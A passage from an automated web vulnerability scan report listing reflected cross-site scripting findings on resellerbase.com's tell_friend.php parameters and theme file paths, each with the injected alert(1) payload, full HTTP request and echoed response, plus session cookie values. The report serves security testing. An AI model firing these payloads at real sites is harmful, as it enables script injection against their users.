User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tell_friend.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input type="hidden" name="id" value="d50a4\"><img src=a onerror=alert(1)>ab291645ea527fdd0" />
...[SNIP]...

2.4756. http://www.resellerbase.com/tell_friend.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cef"><img%20src%3da%20onerror%3dalert(1)>285a81b19a7 was submitted in the id parameter. This input was echoed as c0cef\"><img src=a onerror=alert(1)>285a81b19a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tell_friend.php?id=12c0cef"><img%20src%3da%20onerror%3dalert(1)>285a81b19a7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=6
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input type="hidden" name="id" value="12c0cef\"><img src=a onerror=alert(1)>285a81b19a7" />
...[SNIP]...

2.4757. http://www.resellerbase.com/tell_friend.php [my_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of the my_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d504"><img%20src%3da%20onerror%3dalert(1)>f66ce25d17c69f162 was submitted in the my_email parameter. This input was echoed as 9d504"><img src=a onerror=alert(1)>f66ce25d17c69f162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com9d504"><img%20src%3da%20onerror%3dalert(1)>f66ce25d17c69f162&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wiener&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="my_email" value="wiener@example.com9d504"><img src=a onerror=alert(1)>f66ce25d17c69f162" />
...[SNIP]...

2.4758. http://www.resellerbase.com/tell_friend.php [my_name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php

Issue detail

The value of the my_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a82a7"><img%20src%3da%20onerror%3dalert(1)>0b73c488f438d0edb was submitted in the my_name parameter. This input was echoed as a82a7"><img src=a onerror=alert(1)>0b73c488f438d0edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tell_friend.php?captcha_key=555-555-0199@example.com&my_email=wiener@example.com&pflag=tf&friend_name=Peter+Wiener&my_name=Peter+Wienera82a7"><img%20src%3da%20onerror%3dalert(1)>0b73c488f438d0edb&friend_email=wiener@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tell a friend</title
...[SNIP]...
<input class="text3" type="text" size="20" name="my_name" value="Peter Wienera82a7"><img src=a onerror=alert(1)>0b73c488f438d0edb" />
...[SNIP]...

2.4759. http://www.resellerbase.com/tell_friend.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tell_friend.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cc40<script>alert(1)</script>0659971a97d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tell_friend.php8cc40<script>alert(1)</script>0659971a97d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tell_friend.php8cc40<script>alert(1)</script>0659971a97d/ was not found on this server.</p>
...[SNIP]...

2.4760. http://www.resellerbase.com/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b50e<script>alert(1)</script>83b72daf045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes2b50e<script>alert(1)</script>83b72daf045/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes2b50e<script>alert(1)</script>83b72daf045/ was not found on this server.</p>
...[SNIP]...

2.4761. http://www.resellerbase.com/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1027c<script>alert(1)</script>2d82de75ff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes1027c<script>alert(1)</script>2d82de75ff7/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes1027c<script>alert(1)</script>2d82de75ff7/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4762. http://www.resellerbase.com/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9072c<script>alert(1)</script>a0e90cce9a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos9072c<script>alert(1)</script>a0e90cce9a4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos9072c<script>alert(1)</script>a0e90cce9a4/ was not found on this server.</p>
...[SNIP]...

2.4763. http://www.resellerbase.com/themes/kosmos/ajax.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/ajax.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 59a7b<script>alert(1)</script>9390b182871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes59a7b<script>alert(1)</script>9390b182871/kosmos/ajax.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes59a7b<script>alert(1)</script>9390b182871/kosmos/ajax.js was not found on this server.</p>
...[SNIP]...

2.4764. http://www.resellerbase.com/themes/kosmos/ajax.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/ajax.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec5fe<script>alert(1)</script>f94c3d1f46f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosec5fe<script>alert(1)</script>f94c3d1f46f/ajax.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosec5fe<script>alert(1)</script>f94c3d1f46f/ajax.js was not found on this server.</p>
...[SNIP]...

2.4765. http://www.resellerbase.com/themes/kosmos/ajax.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/ajax.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d9e0<script>alert(1)</script>ba6102ca981 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/ajax.js6d9e0<script>alert(1)</script>ba6102ca981 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/ajax.js6d9e0<script>alert(1)</script>ba6102ca981 was not found on this server.</p>
...[SNIP]...

2.4766. http://www.resellerbase.com/themes/kosmos/calendar-en.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-en.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b1f2<script>alert(1)</script>dc752dbe034 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes2b1f2<script>alert(1)</script>dc752dbe034/kosmos/calendar-en.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes2b1f2<script>alert(1)</script>dc752dbe034/kosmos/calendar-en.js was not found on this server.</p>
...[SNIP]...

2.4767. http://www.resellerbase.com/themes/kosmos/calendar-en.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-en.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d63cd<script>alert(1)</script>bc74a0437d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosd63cd<script>alert(1)</script>bc74a0437d8/calendar-en.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosd63cd<script>alert(1)</script>bc74a0437d8/calendar-en.js was not found on this server.</p>
...[SNIP]...

2.4768. http://www.resellerbase.com/themes/kosmos/calendar-en.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-en.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d5adf<script>alert(1)</script>02ba47e9784 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar-en.jsd5adf<script>alert(1)</script>02ba47e9784 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar-en.jsd5adf<script>alert(1)</script>02ba47e9784 was not found on this server.</p>
...[SNIP]...

2.4769. http://www.resellerbase.com/themes/kosmos/calendar-setup.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-setup.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b9e8<script>alert(1)</script>7d7b24874d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes6b9e8<script>alert(1)</script>7d7b24874d7/kosmos/calendar-setup.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes6b9e8<script>alert(1)</script>7d7b24874d7/kosmos/calendar-setup.js was not found on this server.</p>
...[SNIP]...

2.4770. http://www.resellerbase.com/themes/kosmos/calendar-setup.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-setup.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0f09<script>alert(1)</script>cbe41c8a9df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosa0f09<script>alert(1)</script>cbe41c8a9df/calendar-setup.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosa0f09<script>alert(1)</script>cbe41c8a9df/calendar-setup.js was not found on this server.</p>
...[SNIP]...

2.4771. http://www.resellerbase.com/themes/kosmos/calendar-setup.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-setup.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ab679<script>alert(1)</script>5d9d54cfb5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar-setup.jsab679<script>alert(1)</script>5d9d54cfb5f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar-setup.jsab679<script>alert(1)</script>5d9d54cfb5f was not found on this server.</p>
...[SNIP]...

2.4772. http://www.resellerbase.com/themes/kosmos/calendar-system.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-system.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db4c8<script>alert(1)</script>f804c676c56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesdb4c8<script>alert(1)</script>f804c676c56/kosmos/calendar-system.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesdb4c8<script>alert(1)</script>f804c676c56/kosmos/calendar-system.css was not found on this server.</p>
...[SNIP]...

2.4773. http://www.resellerbase.com/themes/kosmos/calendar-system.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-system.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70e88<script>alert(1)</script>3d1e083187d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos70e88<script>alert(1)</script>3d1e083187d/calendar-system.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos70e88<script>alert(1)</script>3d1e083187d/calendar-system.css was not found on this server.</p>
...[SNIP]...

2.4774. http://www.resellerbase.com/themes/kosmos/calendar-system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar-system.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 912b8<script>alert(1)</script>190baac01fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar-system.css912b8<script>alert(1)</script>190baac01fb HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
